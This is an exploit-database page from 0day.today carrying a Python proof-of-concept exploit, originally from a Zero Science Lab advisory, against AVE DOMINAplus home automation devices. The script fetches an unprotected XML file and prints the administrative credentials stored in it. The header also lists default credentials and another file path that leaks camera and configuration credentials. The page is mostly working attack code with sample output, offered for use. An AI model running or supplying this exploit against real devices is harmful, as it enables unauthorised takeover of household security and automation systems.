0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AVE DOMINAplus 1.10.x Credential Disclosure Exploit
#!/usr/bin/env python # # # AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit # # # Vendor: AVE S.p.A. # Product web page: https://www.ave.it | https://www.domoticaplus.it # Affected version: Web Server Code 53AB-WBS - 1.10.62 # Touch Screen Code TS01 - 1.0.65 # Touch Screen Code TS03x-V | TS04X-V - 1.10.45a # Touch Screen Code TS05 - 1.10.36 # Models: 53AB-WBS # TS01 # TS03V # TS04X-V # TS05N-V # App version: 1.10.77 # App version: 1.10.65 # App version: 1.10.64 # App version: 1.10.62 # App version: 1.10.60 # App version: 1.10.52 # App version: 1.10.52A # App version: 1.10.49 # App version: 1.10.46 # App version: 1.10.45 # App version: 1.10.44 # App version: 1.10.35 # App version: 1.10.25 # App version: 1.10.22 # App version: 1.10.11 # App version: 1.8.4 # App version: TS1-1.0.65 # App version: TS1-1.0.62 # App version: TS1-1.0.44 # App version: TS1-1.0.10 # App version: TS1-1.0.9 # # Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System. # Designed to revolutionize your concept of living. DOMINA plus is the AVE home # automation proposal that makes houses safer, more welcoming and optimized. In # fact, our home automation system introduces cutting-edge technologies, designed # to improve people's lifestyle. DOMINA plus increases comfort, the level of safety # and security and offers advanced supervision tools in order to learn how to evaluate # and reduce consumption through various solutions dedicated to energy saving. # # Desc: The application suffers from clear-text credentials disclosure vulnerability # that allows an unauthenticated attacker to issue a request to an unprotected directory # that hosts an XML file '/xml/authClients.xml' and obtain administrative login information # that allows for a successful authentication bypass attack. # # Default credentials: admin:password # Configuration and camera credentials disclosure: /xml/tsconf.xml # # ================================================== # root@kali:~/domina# ./poc.py http://192.168.1.10 # # Ze microfilm: # ------------- # Username: arnoldcontrol # Password: P1sD0nt5pYMe # ================================================== # # Tested on: GNU/Linux 4.1.19-armv7-x7 # GNU/Linux 3.8.13-bone50/bone71.1/bone86 # Apache/2.4.7 (Ubuntu) # Apache/2.2.22 (Debian) # PHP/5.5.9-1ubuntu4.23 # PHP/5.4.41-0+deb7u1 # PHP/5.4.36-0+deb7u3 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5550 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php # # # 06.10.2019 # import sys,re import xml.etree.ElementTree as XML from urllib2 import Request,urlopen if (len(sys.argv) <= 1): print '[*] Usage: poc.py http://ip:port' exit(0) host = sys.argv[1] headers = {'Accept': 'application/xml'} request = Request(host+'/xml/authClients.xml', headers=headers) print '\nZe microfilm:' print '-------------' xml = urlopen(request).read() tree = XML.fromstring(xml) for user in tree.findall('customer'): print 'Username: ',user.get('plantCode') for pwd in tree.iter('password'): print 'Password: '+pwd.text+'\n' # 0day.today [2024-12-24] #